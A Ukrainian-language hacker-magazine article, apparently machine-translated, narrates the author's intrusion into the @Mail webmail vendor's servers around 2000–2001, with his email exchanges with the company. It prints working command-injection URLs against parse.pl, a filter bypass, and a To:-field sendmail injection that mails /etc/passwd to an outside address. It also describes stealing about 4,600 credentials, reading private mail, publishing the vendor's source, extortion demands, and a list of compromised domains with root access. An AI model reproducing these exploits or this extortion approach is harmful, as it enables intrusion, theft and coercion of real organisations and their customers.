Історія однієї помилки, Інтернет і інші мережі, Security & Hack, статті

Dervik, HackZone

Все почалося з того що було предложени з обміну софтом і був мені присланий
список пропонованого софта з лінками на виробника. В офісі тоді стояв
питання про написанні мейл гейта для сайту і відповідно з надісланого
списку в першу чергу проглядалися сайти з хвилюючою темі.

Зайшовши на один з таких сайтів atmail.com (виробник cgisupport.com)
познайомився з програмою atmail вартості якої розкидалися через
Складність, всього 4е типу і ціни $ 499 $ 950 $ 1950 $ 4950.

Надихає, чи не так:)?!

parse.pl

У превелике щастя висіла та демка для переглянути
<Click>
… Відкрилася – без фреймова … статус лайн закліпав різними лінками
які довантажувати в iframe … Оп-Па

http://webbasedemail.com/atmail/parse.pl?file=javascript/common.js

Ага, значить любимо відкривати файли таким макаром … відкриваємо нове віконце
т.к. улюблене CaptureNet підсік заголовок, а в ньому кука з номером сесії:)
який юзають на перевірку всі файли цього софта.

Пишемо: http://webbasedemail.com/atmail/parse.pl?file=parse.pl

Отримуємо:

#!/usr/bin/perl
# parse.pl atmail 2000 (C) 1999-2000 cgisupport.com                                        
# For further information regarding atmail see http://cgisupport.com
# License agreement available via http://cgisupport.com/license/

# Parse a file with embeded 
# atmail library configuration
use CGI qw(:standard);
use CGI::Carp qw(fatalsToBrowser carpout);

# Find cwd and set to library path
use FindBin qw(/usr/local/etc/httpd/htdocs/atmail);
use lib "/usr/local/etc/httpd/htdocs/atmail/libs";

do "/usr/local/etc/httpd/htdocs/atmail/atmail.conf";

require 'Common.pm';

&config;

if(parse.pl)    {

# Don't let people get the root / !!
parse.pl =~ s/^///g;
parse.pl =~ s/..//g;
# Expand 
parsefile("parse.pl");
        }

М-да не красиво: (, він виявляється при виведенні впихає реальні змінні
тобто виконує його і відповідно замість parse.pl повинно бути, що щось типу
$ File – назва змінної. Але не біда:) дивимося те що отримали і ….. от
воно **** ПОМИЛКА ****, душа радіє:)) г-рр, і думки типу: “ну що вам заважало
почитати звичайні репорти з помилок у CGI ??!!!…. а нічого, головне ціна!
а те що є помилки – не біда виправимо, дурні, придурки, але ж ваші клієнти
і не підозрюють що у вашому ПО ТАКА ДІРА !!!!”.

А не було то перевірки на один нічим не значимий символ який поруч із кнопкою
“BkSp” а саме |.

Перевіряємо наші радості рядком у урле браузера:

http://webbasedemail.com/atmail/parse.pl?file=|ls|

….. Ііііііііі-ІІІ на:

    CHANGELOG
    INSTALL
    README
    addpop3.pl
    addressbook.pl
    atmail.conf
    atmail.pl
    attachment.pl
    compose.pl
    defaults.conf
    docs
    domains.conf
    help.pl
    html
    images
    imgs
    index.html
    index.pl
    install.pl
    javascript
    ldap.pl
    libs
    logout.pl
    mime-tmp
    modules
    movemsg.pl
    newmbox.pl
    parse.pl
    passutils.pl
    reademail.pl
    refer.pl
    saveemail.pl
    search.pl
    sendmail.pl
    settings.pl
    showmail.pl
    startpage.pl
    utils
    vdisk.pl
    wapatmail.conf
    wapatmail.pl
    wapdefaults.conf
    webadmin

…. Ну і що думати після цього:)?!!

Думаємо ось так:

http://webbasedemail.com/atmail/parse.pl?file=|cat</etc/passwd|

…. Думки конверт у:

kernel:*:0:0:System Kernel:/:/nonexistent
daemon:*:1:1:Owner of many system processes:/:/nonexistent
bin:*:3:7:Binaries Commands and Source,,,:/:/nonexistent
nobody:*:65534:65534:Unprivileged user:/nonexistent:/nonexistent
atmail:*:7715:1000:VS-atmail.com-atmail Networks-200:/:/usr/bin/bash
aschwin:*:7715:7716:Aschwin Wellisus:/nonexistent:noftp
demo:*:7715:7716:demo:/nonexistent:noftp
test:*:7715:7716:Test Account:/nonexistent:noftp

Просто ЧУДОВО …. але широка душа російської людини і добра до всього,
Недарма все лаються – хакери, панімаешь, зломщики, … так от немає, добрі
ми допомагаємо вам ідіотам які читати не хочуть та й адмінів своїх і
програмерів не люблять, мабуть як платите так і пишіть.

Добре вилив душі конвертнулось в лист на info@cgisupport.com з БАЛЬШІМ
репортом про дірку. А так забув спочатку було просто лист із попередженням про
дірі, але як я вже казав – не люблять вони читати … логи наприклад.

Відповідь 1

@
Dear Dervik,

Thanks for your alert on this.

Sometimes, as you may know, it is hard to stay focused on such details as
security if you are involved to much on the coding for a while. It needs
some distancy like normal customers or users have to get grip on such
details to avoid problems like being hacked to easy.

If you can give us more details on this on how you got to this conclusion.
Which steps you did take when it occured, which browser, which configuration
etc. This might help us a lot to get this hole fixed as soon as possible.
If you find other bugs (while we are a sleep = ( ), please report them to
us so we can fix them.

I let the technical staff know that we have very adequate help from the
outside instead of our own focus on security which appearantly lacks on
being accurate.

Thanks again and we certainly keep in touch. (maybe i can mention a reward
or something ;- ) )

Kind regards,
Aschwin Wesselius,
Dutch Representative
CGIsupport – The Netherlands –

Відповідь 2 (після отримання репорту)

@
Thnx. I pass this to our technical staff immediately.

This helps us a lot. Again, if you find other things we really have to know,
please e-mail us asap.

Since you reported this bug to us, it is likely we can trust you in a
matter. We keep contact on this, be sure of that !!

Are you a Perl-guru your self? Since we need some people to test our
software once in a while, like it shows right now. We would like to have a
discussion on that if it suits you. It is not about full-time testing etc.
But once in a while having something to look at and be paid for it. What do
you think?

Kind regards,
Aschwin Wesselius

Ось, зраділи люди, подобається мені приносити радість людям,
Use Your Powers For Good, Not Evil …. амінь.

Ведемо невелику переписку (звиняйте за мій інгліш:)

@
From: Dervik
To: “CGI Support ::: Aschwin Wesselius :::” <info@cgisupport.com>
Sent: Friday, December 08, 2000 12:15 PM
Subject: Re: BUGSzzzz in @Mail

> > Are you a Perl-guru your self? Since we need some people to test our
> > software once in a while, like it shows right now. We would like to have
a
> > discussion on that if it suits you. It is not about full-time testing
etc.
> > But once in a while having something to look at and be paid for it. What
> do
> > you think?
>
> I guru?! I do not know, may be 😉 I agree to test your programs, but for
> this purpose to me they should be had locally, and as I am interested by a
> kind and quantity of payment for it.
>

Ок, продовжуємо мочити сайту реквести далі. Як видно з вище згаданого
кореневої лістинг у нас є, відповідно те що без розширення – мабуть
директорії, лазіім, дивимося панімаешь … розвідали в Діра utils Філікі
convert_user.pl, запускається і браузера … довго щось …. облом?! .. ан ні:)
…. Демка – ПОМЕРЛА, значить що то вона їм всетаки наконвертіла:)

Надсилаємо мив з поздоровленнями про впала Демея і отримуємо відповідь:

Лист від першого тов.
@
Hi Dervik,

I just saw the message on this afternoon after the Christmas days.

So it appears that the webbasedemail server went down? And what
do you have to say about it then? Do you know how it happened or
can you give explainations on how such things could be solved? How
did you found out, or did you tried something nasty (no problem, we asked
you to test it)?

Please notify us (Ben too), so we can take action on it.

Greetings,

Aschwin

> See your server is crashed
>
> http://cgisupport.com/atmail/atmail.pl?username=test&pop3host=
> cgisupport.com&password=demo-99
> ….but if you ask how? probably i tell to you

… А тепер від їхнього Бос:)
@
Hi Dervik!

Ben here from CGIsupport.com , thanks for your email. We are keen for you
to work with us, although, what price per hour are you looking at ?

Did you change the atmail.conf file for the demo account to stop working ?
I notice the user_dir was changed.

I hope to hear from you !

– Ben Duncan [info@CGIsupport.com]
Software for the new generation at :
http://CGIsupport.com

…….. Отак повільно посміхаємося у всі 64 зуба … пускаємо сльозу і мило з
відповіддю …. всі задоволені, всі сміються

Але є ще одна папка – webadmin, ну подивимося .. подивимося .. подивилися:)
А тут то братці у вас виявляється конфігураційна прога через веб, дуже
КУУУУЛ!

Дивимося і маємо:
Install Directory: /usr/local/etc/httpd/htdocs/atmail
User Directory: /usr/local/atmail
….blah..blah..blah
Sendmail Binary: /usr/sbin/sendmail -t -oi -oem
… АГА .. оч добре

Тестуємо на стандартну помилку, в Демея відсилаємо мив але в поле To: пишемо:
!cool!@yahoo.com; mail !cool!@yahoo.com </etc/passwd|

…. Отримуємо лист:

X-Apparently-To: !cool!@yahoo.com via mdd102.mail.yahoo.com
X-Track: -40
Received: from 213.189.1.4 (EHLO atmail.nl) (213.189.1.4)
by mta429.mail.yahoo.com with SMTP; 27 Dec 2000 04:11:36 -0800 (PST)
Received: (atmail@localhost) by atmail.nl (8.9.2) id MAA59162; Wed, 27 Dec 2000 12:07:43 GMT
Date: Wed, 27 Dec 2000 12:07:43 GMT
From: atmail@atmail.nl (VS-atmail.nl-Atmail Networks-200)
Message-Id: <200012271207.MAA59162@atmail.nl>
kernel: *:0:0:System Kernel:/:/nonexistent
daemon: *:1:1:Owner of many system processes:/:/nonexistent
bin: *:3:7:Binaries Commands and Source,,,:/:/nonexistent
nobody: *:65534:65534:Unprivileged user:/nonexistent:/nonexistent
atmail: *:7715:1000:VS-atmail.nl-Atmail Networks-200:/:/usr/bin/bash
aschwin: *:7715:7716:Aschwin Wellisus:/nonexistent:noftp
demo: *:7715:7716:demo:/nonexistent:noftp
test: *:7715:7716:Test Account:/nonexistent:noftp
webos: *:7715:7716:WebOS:/nonexistent:noftpContent-Length: 0

ПРАЦЮЄ !!!… виходить:) … ГУТ

Надсилаємо в боса їхнього листа:


@
Dear Ben I not the thief and I asked you earlier to give me an initial code
of your program for testing.

You have not given me it, it is possible is connected to mistrust but I do
not use the another’s commercial projects in the commercial objectives as
also itself I do not love when others use by my programs for reception of
money.

I need code for the testing for a code for show you all back doors and all
holes in protection of a product (to find them but without a code on it some
time) is required.

At present on mine to the account already 2 bug reports.
Hackers take for 1 business hour ~500 $, I offer you for everyone bug report
to pay to me 150 $ which it will be possible in itself to have some items on
breaking.

With the purposes of confirmation of our cooperation I ask to transfer 200 $
for 2 bug reports sent you earlier.

Second bug report I shall send to you at once as soon as money will arrive
on my account.

PS if I was vandal that already for a long time would copy all from your
server, and probably simply would destroy him or would sell bug report to
any man.
PPS I wait from you of a code of the program
PPPS and sorry for my english 😉

> Boss here from cgisupport.com , thanks for your email. We are keen for you
to work with us, although, what price per hour are you looking at ?
> Did you change the atmail.conf file for the demo account to stop working ?
I notice the user_dir was changed.
> I hope to hear from you !

… Х-мм, знову ж таки прошу вибачення за мій кривої інгліш, але суть в тому, що
до неподобства хочеться допомогти людям …. але звичайно не за безкоштовно:)

….. Довго немає відповіді ….. нудьгуємо ….. занудьгували зовсім ….. прийшло:) родима
як не дивно в цю історію додався ще один персонаж …

… І так, лист:

@
Hello Dervik,

This is Heather from CGIsupport.com. Thank you for your email.

We do appreciate your recent emails regarding our @mail software however we
were not under the impression that you required payment for your ideas. We
do get an amount of customer feedback from the public that is sent just out
of interest and we gladly accept all thoughts and suggestions.

You seem to have good knowedge in internet security, so we would be
interested in working with you. However your prices are too expensive for
our company at the present moment. Perhaps we can arrange a more suitable
deal for both of us. Please let us know what else you have in mind.

Hope your new year is enjoyable.

Regards,
Miss Heather Stevens
Marketing and Support
Heather@cgisupport.com

…. От блін, не зрозуміли напевно, я їм конкретну пропозицію, а вони мені
про відсоток какой то парять, м-да, це не серьездно …

пишемо відповідь (при цьому намагаємося взяти на понт, даремно чтоль знайшов!,
за нехлюйство треба платити … 🙂


@
> We do appreciate your recent emails regarding our atmail software however
we
> were not under the impression that you required payment for your ideas. We
…not under the impression ???!!!! If i said you what i have full atmail
soft from you server atmail.com, i make impression for you?

> Please let us know what else you have in mind.
My mind it is my mind, if you do not want pay me – tell to me.

> Hope your new year is enjoyable.
…and for you 😉

…. Маманькі, а parse.pl то пофіксено 8-( при його перегляді таким же
макаром як і раніше отримуємо:

.............
1. # Don't let people get the root / !!
2. parse.pl =~ s/^\///g;
3. parse.pl =~ s/\.\.//g;
4. # Do not allow users to open binarys!
5. parse.pl =~ s/\|//g; 
6. parse.pl =~ s/ //g;
.............

в 6й рядку виявляємо пробіл – але як виявляється це 0х00:)
ги, а логи то читати почали, ха! скажу що чисто через розваги
2:00 експерементіровал з% 00 у рядку запиту. Ну чиста хвалю:))

Мозок починає Потіха скипати, ось казли, а грошей все одно немає …..
беремо аналіз, знову цього … того що отримали і проходимо порядково

Рядок 2 – видаляє рут слеш на самому початку рядка
Рядок 3 – видаляє всі двокрапки якщо є
Рядок 5 – видаляє всі | через які ми запускалися

…. Думі … ВИГАДАЛИ! :))) … Сильна думка, а понту то?!
кидаємо http://atmail.com/parse.pl?file=//.|./.|./.|./.|./.|./.|./etc/passwd
** При проходженні всіх рядків у parse.pl на виході для обробки
виходить що file =/../../../../../../ etc / passwd і …. ми його знову бачимо:)

webadmin

….!!!! АЛЕ !!!!… як можна було щось забути про директорію webadmin там же
/usr/sbin/sendmail -t -oi -oem

Чекаємо пізнього вечора коли всі вже сплять, як було відмічено при будь-якому
перекручування їх проги (вони стежили:) відразу разбекапівался архів і
вона працювала як і раніше. Після аналізування вмісту головної
директорії знаходимо що всі ці установки лежать в atmail.conf і якщо
викликати його браузером він покаже все як треба (а міг би жити якщо
б. htaccess в корінь поклали з правильними заборонами):) тобто

# Configuration file for atmail
# Modified on Wed Dec 27 16:32:02 2000 via webinterface

$HTTP_Proxy = "";
$Pref_CloseTag = "</B>";
$Pref_OpenTag = "<B>";
$SQL_Name = "";
$SQL_Pass = "";
$SQL_Server = "";
$SQL_Type = "";
$SQL_User = "";
$Submit = "Save";
$User_Dir = "/usr/local/atmail";
$adminemail = "info\@cgisupport.com";
$adminpass = "";
$footermsg = "- This email was sent via atmail.com - Checkout http://atmail.nl";
$fullurl = "http://atmail.nl/atmail2000";
$installdir = "/usr/local/etc/httpd/htdocs/atmail";
$mailserver = "1";
$maindomain = "atmail.com";
$sendmailbinary = "/usr/sbin/sendmail -t -oi -oem";
$sessiontimeout = "15000";
$smtphost = "atmail.com";
$userquota = "3145728";
$version = "*.*";
$welcomemsg = "html/welcome_msg.html";
$writeconf = "1";

…. Повільно перекручує тремтячими руками / usr / sbin / sendmail-t-oi-oem
на tar cvf ppp.tar *

… Натискаємо внизу кнопку “SAVE” … параметри збережені, заходимо в дему
вбиваємо всяку нісенітницю в формі для відправлення листа – обіймає “Send” …. Іііііі
ііііі … оргазміруем забираючи Філікі ppp.tar

… Швидко .. швидко .. швидко виконуємо ті ж маніпуляції для одержання Діри / etc
… Знову завантажуємо … З-А-Ш-І-Б-І-С-Ь:) маємо все :)… ну або майже все ..
параметр швидко замінюється на rm ppp.tar …. проробляючи при цьому липову
посилку листи …

Повертаємо в початкове положення параметр Sendmail Binary …. щоб нічого
поганого про нас не подумали … типу прийшов … наслідив … і т.п.

І так, дивимося що нам ТАR насущний приготував … ОП-ПА … але ж у них
будь-яка зміна конф Філікі дублювалося на мив, правда на стільки криво
що отримали вони максимум лист що хтось натиснув на кнопку “SAVE” і
прописалися заново ті ж параметри, фрукти – гут:)

Дивимося далі, знаходимо:) м-да виявляється вони самі себе вирішили підставити
ВОНИ ЮЗАЛІ дему як реальну прогу …. знаходимо мив доступ боса на обсалютно
інший сервер …. балуемся достовая 1247 повідомлень, ай-яй-яй як недобре
залишати стільки мила на сервері, треба поважати адміна, адже йому місце
вільно ВО як необхідно! 🙂

… Тупо переглядаємо мив … поимели якихось непотрібних паролів і логінів …
… Купу … доступ на зміну DNS для декількох акаунтів … ще чогось ..
.. Загалом не цікаво

Дивимося файло таровское далі, УРАаааа, знаходимо цікавих Філікі
activeusers.pl називається дивимося всередину -: (всі покоцали і коштує висновок
“Disabled in demo version!”, Погано АЛЕ є якийсь active09.pl – викликаємо
через браузер …. Вуаль …. 🙂 Величезний список юзверя з лінком на
перегляд проперті у кожного, тискати перегляд – ги ги ги ги Є
логін пароль, тощо, то що доктор прописав:) …. кропаем маленьку
прогу (самому ж лінь лазити) вона довго шарудить а потім вивалюється по
тайм ауту … і так, тепер ми маємо ~ 4600 логіна / пароля в які входить і
вся їх команди:) … зливаємо мило (без видалення на сервері звичайно) ..
…. Зливалося ООооООчень довго, потім ще 2 дні проглядалося

.. Виявилася ще одна помилка, якщо правильно набрати шлях то можна і
без логіна / пароля подивитися що лежить у поштовій скриньці ..
приклад: http://terget.com/users/ben @ cgisupport.com / mbox / Inbox
це можна виправити тільки з допомогою. htaccess, т.к. навіть при перенесенні
директорії користувачів за межі директорії веб сервера її можна
буде дивитися так само як і passwd …

Тепер, як видно з листа предидущего Я не справив враження на них,
а саме на неї:) … ну що дівчинка на подивися, … викладаємо Тарік
їх копії atmail.nl сервера на http://ddpd.virtualave.net/atmail.tar.gz
потім надсилаємо лист і неде, що нас почнуть поважати і полюблять АЛЕ ….

@
Hello Dervik,

I dont understand what us going on with your relationship to CGIsupport.com.
Please explain to me via email why we should be paying you and what made you
think this.

I have seen that our @Mail software is now avilable for download from the
below link, this goes against our licensing agreement and we will have to
take action against this if it is not removed within 12 hours.

Please let us know exactly what is going on here, and why you think we are
taking advantage of you?

Look forward to hearing from you, if you would like to speak via chat or
phone please let me know.

Miss Heather Stevens
Marketing and Support
Heather@cgisupport.com

—– Original Message —–
From: Dervik
To: “Heather, cgisupport.com” <heather@cgisupport.com>
Cc: “CGI Support ::: Aschwin Wesselius :::” <info@cgisupport.com>
Sent: Thursday, December 28, 2000 8:42 AM
Subject: Re: BUGSzzzz in @Mail

> see that http://ddpd.virtualave.net/atmail.tar.gz
> i`m not joke

… ВОТ і вся любов, лист це було отримано прям перед новим роком .. але
продовжуємо дивитися пошту і поповнюємо запас логінів і паролів. Їхнє ПО
має таку особливість – при інсталяції надсилати конфіг файл де є
всі логіни і паролі.

Головне не дати відпочити цим товаришам і тримати їх в напряг:) посилаємо
мив пану Aschwin Wesselius і пропонуємо зустрінеться в чаті (який був
організований на їхньому сервері і про нього інші смертні не знали :)… не проходить
і 5і хвилин як він з’являється там, розмова була практично ні про що, питання
про те чому вони не хочуть заплатити за забезпечення нормального захисту їх
сервера був цим паном відкинутий “… я не компетентний в цьому питанні,
а наші шефи зараз у відпустці на новий рік “… ось такі от справи.

… Ну поки шефоф немає, весь сервер практично в моєму розпорядженні, лазіім,
дивимося, правимо декілька помилок в їхніх скриптах, і помічаємо смішну вестч:)
у них на головному сайті є 2 лінка:

1. веб камера (подивіться як працюють наші програмери)
2. реал-видио конференція для клієнтів

… Дивимося обидва лінка на їх сервері локально – 1лінк:) всі картинки статичні
і мінялися останній раз в середині 2000 року, а 2й лінк – порожній зовсім …
ну немає там нічого хоч і вхід в цю папку за логіном / паролем – обдурювання ..
в іншому їхні програми той же обдурювання тому вийшла версія 2.0 (17.01.01) – з НЕ
ПОФІКСАННИМ parse.pl !!!!… м-да, а ще серйозна компанія.

.. Ще на сервері знаходиться:) … вгадайте що ??!!!… база клієнтів з їх
Кредит, адресами, сайтами, тощо, але я не кардер і ця інфа мене не цікавить.

… Пробуємо інший підхід – метод залякування:), пишемо їм що вони мають 4 дні
на відповідь мені або я завалю їх сайти а так само повідомлю клієнтам про баги і тд
… І огого відразу ж приходить лист з відповіддю (і ведемо деяку листування)

@
Ben Duncan 22 січня 2001 19:24
Hi Dervik,
We would like to work with you, but we don’t like your attitude.
So, in other words, “We don’t pay you, then your going to sabotage us?” sounds
like a ransom 😉

@
Heather Stevens 22 січня 2001 20:08
Hello,
We are looking for people to work with us, we offer good rates and working
conditions. We have a job application page that you can submit your details,
we will only take an interest in your work after you have done this, rather
than threatening us with problems.
If you are serious in working with us please start this off on the right
foot and submit your details as a job application.

…. От тільки не треба мені парити що ви всі такі добрі ….

@
Dear Ben and Heather

my english did not get me said ease for you, it is my problem
my motto “Use Your Powers For Good, Not Evil”, but you did not answer on my
mail – it is bad attitude to man who is want help you and your company
if i wanted sabotaged you , i would make it for new year (style surprise) 😉
i offered you to pay for your errors, not distributing the information in a
network and not informing the clients
and i submitted my details at december
I speak – I can make only if is sure in it

@
Ben Duncan 23 січня 2001 7:27
We have been monitoring our servers closley , have noticed alot of
un-authorized connections and activity. Let’s hope its not you, or one of
your friends.

… Ну нарешті те расшевілілісь:), “Їжак псіца горда – поки не пXнешь не полетить!”.
Як повідомив мені один мій друг, в германии продається книжка по Перл-у на останній
сторінці така (або приблизно така) напис:
“Якщо ви прочитали цю книгу і зрозуміли її то зателефонуйте за таким то номером або приїдьте
за таким то адресою – ми вам компенсуємо вартість цієї книги і запропонуємо роботу “

LOL

@
Ben Duncan 24 січня 2001 9:09
Dervik,

What do you think you are doing ?

>you have one day that to tell to me yours ideas about exit from this
>situation
>
>1h = $100 (rates is grow 1day – 1zero)
>
>1) you paid me – i am protect yours sites and programms + new version atmail
>you will give to the clients free-of-charge
>2) you NOT paid me – your clients receive information about bugs in atmail
>(BO – you can not save security on your server if you used atmail) and
>clients payment DB
>
>bad programms – lost money
>
>choose your destiny

@
Heather Stevens 24 січня 2001 9:17
Listen Dervik.

We never asked you for your help. We never said that we would pay you nor
entered into any agreement with you. If you want to work for us we can write
up a full proposal, as we do for all CGIsupport employees and collect your
tax file number and bank account details.

We wont pay you money for blackmailing us, its crazy and highly unprofessional.
I have no idea why you want to cause problems for hard working and honest people.
Waste your time on someone deserving who really does have crap software.

Anyway, if you want to go about this in a serious matter then do so. Stop wasting
our time and yours with this blackmail crap. I will be forced to speak to our legal
department and this will be a hassle for you. I don’t want to see you get into
trouble.

@
Ben Duncan 24 січня 2001 9:58
Fine,

We will pay you $200 USD for your troubles. Because we still believe in your
honesty, you will not abuse our information. In return you will report to us
what ‘security’ bugs you have found in @Mail, and what information you have
stolen from our servers.

We do not want to continue using your services after this.

Since we have your bank-account information, and log files of your activity
on our server(s) , we have tracked you down . You have accessed our system,
and clients servers illegally/unautorized.

If you push the matter, we will contact our local authorities and take action
against you. This is not how we have wanted it.

It does not matter where you are located.

… Так я вообше то і не намагався приховати свою присутність, я не кракер !!!… хоча іноді дуже хочеться прибити кого небудь …

@

> Listen Dervik.
^^^^^^^^^^^^
it is a GOOD start

> We never asked you for your help. We never said that we would pay you nor
entered into any agreement with you.
^^^^^^^^^^^^^^^^^^^^^
I did not wait that you offer me it

> If you want to work for us we can write up a full proposal, as we do for
all CGIsupport employees and collect your tax file number and bank account
details.
^^^^^^^^^^^^^^^^^^^^^
I am mailed my account records to you, if you lost that – it is your problem

> We wont pay you money for blackmailing us, its crazy and highly
unprofessional. I have no idea why you want to cause problems for hard
working and honest people.
^^^^^^^^^^^^^^^^^^^^^
blackmailing ????!!!!!! no :-/ i am not used it
You not correctly understood me..I offered you to pay for the information

> Waste your time on someone deserving who really does have crap software.
^^^^^^^^^^^^^^^^^^^^^
YOUR HAVE CRAP SOFTWARE AND YOUR CLIENTS DO NOT KNOW ABOUT IT!!!
I AM GIFT YOU 2-3 ERRORS IN YOUR PROGRAMM

NOT BE STUPID

> Anyway, if you want to go about this in a serious matter then do so. Stop
wasting our time and yours with this blackmail crap. I will be forced to
speak to our legal department and this will be a hassle for you. I don’t
want to see you get into trouble.

OK, speak, but your clients will speak with you in court

GUYS !!!! I AM WANT HELP YOU AND YOUR CLIENTS !!! BUT YOU NOT understood
me!!!

I AM NOT NEED YOUR MONEY – IT IS GREED-TEST AND YOU not handed over it !!!

I finish contact with you, but I not tell about holes. I am kill info in
local hard disk.

May be in any time , any guy hacked you, but you is GREED and you is lost
time.

BYE

… А хто каже що я їм повинен допомагати ???!!!

@
Ben Duncan 24 січня 2001 11:00
Hello Dervik,
We don’t want to cause any headaches, please understand our situation and
how we feel after you threating us.
Keep in mind we have been very closely monitoring our servers, since your
‘hacking’ into our servers we have taken the matter very seriously.

@
Ben Duncan 24 січня 2001 11:06

tcp        0      0  213.189.1.7.21         195.*.*.*.44936    CLOSE_WAIT
tcp        0      0  213.189.1.7.21         195.*.*.*.63759   ESTABLISHED
tcp        0      0  213.189.1.7.21         195.*.*.*.63755   ESTABLISHED

Seriously, if you continue accessing our servers without our permissions then
we’ll be forced to take action against you.

… Логи дивимося, ну нарешті те, мізки проростало почали, у себе то ви дивитеся
а ось ваші клієнти в цей момент можуть померти: – /

нарешті вони здалися:) VICTORY!

@
Please understand the situation you have placed us in, and how we are taking
the illegal access to our servers seriously.

>I SAID YOU – I AM finish contact with you and your servers
>in your servers i am entered yesterday
>see time/date in your logs

Пам’ятка:
Якщо ви постачальник послуг інтернет або програм для сайтів і вруг вам присилають
лист про те, що вас чи ваших клієнтів можуть зламати через ваших помилок,
не будьте жадібними або пихатими, підійдіть до цього питання з усією серйозністю
т.к. це може загрожувати вам бпрольшим збитками чим заплатити кілька баксів
для виявлення багів. Користуйтеся послугами професіоналів для тестування. І.. будьте дружелюбніше.

… Ось так із-за однієї помилки не якісного програмного забезпечення для
сайту може постраждати велика кількість людей, я ще забув упамянуть логіни
до поштових серверів ~ 4600шт. якщо піти ще й через них то ПОЛОВИНА:)
зламаного інтернету забезпечена … є така штука – прогресія геометрична

Епілог

Маємо:
ID для завантажування їх комерційних прог: XXX.
Весь спектр їх комерційного продукту.
Доступ до DNS облікових записів: 3.

А ТАКОЖ

Могли бути зламані! (Збір інформації зупинений 24 Jan 2001)

netbasedsoftware.com [r/u+/cgi-bug]
– vitalgroup.com.au
– netwapware.com
– cgisupport.nl
– cgisupport.com
– webbasedemail.net
– webbasedemail.com
– wildwear.net
– electricshop.nl
– netbasedshop.com
– electricshop.net
– ibacus.com
– activeware.fi
– writetome.net
– wapatmail.com
– mailos.com
– atorganise.com
– pulu.net
– atmail.nl

* smartservers.com [u]

* dialability.smallplanet.co.uk [u]

* 64.56.69.254 [r/u]

* 203.41.69.50 [r/u]

* 194.6.201.7 (pop.domainsrforever.co.uk) [r/u+]

* www.eMatters.com.au [u]

* 213.239.42.121 (raq288.uk2net.com) [u]

* 203.41.69.131 [r]

* diversity.he.net [r]

* vserver1.teletik.nl [r]

* www.beshost.com [r/u]

* sissify.com [u]

ionhosting.com [r/cgi-bug]
– ion-as.com
– connectingpeople.nl
– cindypielstroom.nl
– pattybrard.nl
– hunsel.net
– marketingconsult.nl
– insideoutbv.com
– primordial.nl
– solnet.nl
– hbok.nl
– hasker-kroon.nl
– sungate.nl
– djcafesol.nl
– kies-uw-karpet.nl
– vandenbrink-campman.nl
– vandenbrinkencampman.nl
– devrijesoos.com
– dbxl.nl
– sungategraphix.com
– demooiemens.nl
– heerding.nl
– sqlshop.nl
– bonicha.com
– eyenet.nl
__________________________
56 Адреса
* 12 не досліджені

r – root access
u – user access
cgi-bug – CGI back door

Заява:
Всю відповідальність за можливий у майбутньому пречіненний шкоди клієнтам через діряве програмне
забезпечення @ mail, т.к. вони не почули моїх порад, хоча я і вислав їм все репорти про помилки, я покладаю на компанію:

Company         NETBASED SOFTWARE Pty Ltd  (http://netbasedsoftware.com)
ACN/ARBN        088 876 733  
Street Address  458 Greggs Road  
City            Kurrajong  
State           NSW  
Postcode        2758  
Phone Number    02 4573 1789 (+61 294750869)
Full Name       Ben Duncan 
Title           (eg IT Director)  

З моєї ж сторони не було вироблено жодної дії знищення, використання в особистих цілях,
псування або модифікації інформації для заподіяння шкоди кому небудь.
З 24го січня тема пошуку дір і помилок в програмах @ mail для мене вичерпана і закрита і їм висланий повний репорт про існуючі діри.
ІМХО їх програмами користуватися можна тільки в локальній мережі відключеною від інтернет.

Схожі статті:


Сподобалася стаття? Ви можете залишити відгук або підписатися на RSS , щоб автоматично отримувати інформацію про нові статтях.

Коментарів поки що немає.

Ваш отзыв

Поділ на параграфи відбувається автоматично, адреса електронної пошти ніколи не буде опублікований, допустимий HTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

*

*